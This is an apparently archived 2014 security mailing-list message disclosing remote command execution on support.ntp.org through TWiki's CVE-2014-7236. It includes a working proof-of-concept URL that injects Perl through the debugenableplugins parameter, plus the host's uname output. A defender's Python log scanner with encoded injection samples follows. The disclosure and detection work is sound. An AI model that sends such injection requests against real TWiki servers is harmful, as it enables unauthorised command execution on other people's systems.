[ntp:security] [BITCOMSEC] Remote Command Execution on support.ntp.org (re: CVE-2014-7236)

Bitcoin Community Security Project bitcomsecresearch at gmail.com
Fri Oct 10 19:37:22 UTC 2014


Security,

My name is Mike and I am with the BITCOMSEC (bitcoin community security)
project - we usually report vulnerabilities in Bitcoin related exchanges,
pools and merchant sites. Occasionally we find security issues like this
one grave enough to report so that it helps the greater internet community
with a safer secure environment.

As of right now support.ntp.org is vulnerable to Remote Command Execution
via TWiki's recent CVE-2014-7236 (
http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2014-7236). TWiki
allows for the execution of Perl code within the 'debugenableplugins'
variable/feature. An unsafe eval and bad sanitizing allow an attacker
to run commands on your server as the webserver user.

PoC:

http://support.ntp.org/bin/view/Servers/WebRss?debugenableplugins=SmiliesPlugin%3bprint%28%22Content-Type:text/html\r\n\r\nVulnerable
!"%29%3bexit

uname:


FreeBSD psp2.ntp.org 7.2-STABLE FreeBSD 7.2-STABLE #5: Sun Nov 15 13:23:37
PST 2009 root at psp2.ntp.org:/usr/obj/usr/src/sys/GENERIC amd64

I am hoping that this issue be resolved immediately before it is used by
arbitrary third parties to execute commands on the NTP infrastructure.

If you have any questions we are here to help. Look at my signature to
learn more about us, or if you'd like to donate to our cause or shout us
out on twitter! Thanks and hope you fix the issue immediately.

regards,
Mike



-- 
[bitcomsec]
founder und lead security researcher
reddit: https://reddit.com/r/bitcoinsec
twitter: https://twitter.com/bitcomsec
about:
http://blog.bitcomsec.org/post/72193060412/an-introduction-to-bitcomsec
BTC: 1SEC1BS5wFDSToi1v3RubV9PjCSSPa6s9
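
Added example, not part of the original message or of TWiki's code: a log check a defender could run over web server access logs to find requests that put anything other than a plain plugin list in the debugenableplugins parameter. It assumes combined-format log lines and that a legitimate value is a comma-separated list of plugin names; the function names and sample lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote

# Assumption: a legitimate value is a comma-separated list of plugin names.
SAFE_VALUE = re.compile(r"[A-Za-z0-9_]+(?:\s*,\s*[A-Za-z0-9_]+)*")
# Request line inside a combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded values are seen in clear."""
    value = value.replace("+", " ")
    for _ in range(rounds):
        nxt = unquote(value)
        if nxt == value:
            break
        value = nxt
    return value

def suspicious_values(log_line):
    """Return debugenableplugins values that are not a plain plugin list."""
    m = REQUEST.search(log_line)
    if not m:
        return []
    hits = []
    # Perl's CGI module accepts both '&' and ';' between parameters.
    for pair in re.split(r"[&;]", urlsplit(m.group(1)).query):
        key, _, raw = pair.partition("=")
        if decode(key).lower() != "debugenableplugins":
            continue
        value = decode(raw)
        if value and not SAFE_VALUE.fullmatch(value):
            hits.append(value)
    return hits

def scan(lines):
    """Return (line_number, values) for every log line with a suspicious value."""
    return [(n, v) for n, v in ((i, suspicious_values(l)) for i, l in enumerate(lines, 1)) if v]

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Oct/2014:19:01:02 +0000] "GET /bin/view/Main/WebHome?debugenableplugins=SmiliesPlugin,TablePlugin HTTP/1.1" 200 5120',
    '198.51.100.7 - - [10/Oct/2014:19:03:44 +0000] "GET /bin/view/Servers/WebRss?debugenableplugins=SmiliesPlugin%3bprint%28%22x%22%29%3bexit HTTP/1.1" 200 31',
    '198.51.100.7 - - [10/Oct/2014:19:04:10 +0000] "GET /bin/view/Main/WebHome?skin=plain;debugenableplugins=SmiliesPlugin%253bexit HTTP/1.1" 200 31',
    '192.0.2.10 - - [10/Oct/2014:19:05:00 +0000] "GET /bin/view/Main/WebHome HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for lineno, values in scan(SAMPLE_LOG):
        print(f"line {lineno}: suspicious debugenableplugins value {values!r}")
```

A hit in the logs from before the TWiki hotfix was applied is a reason to treat the host as potentially compromised, not only to patch it.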
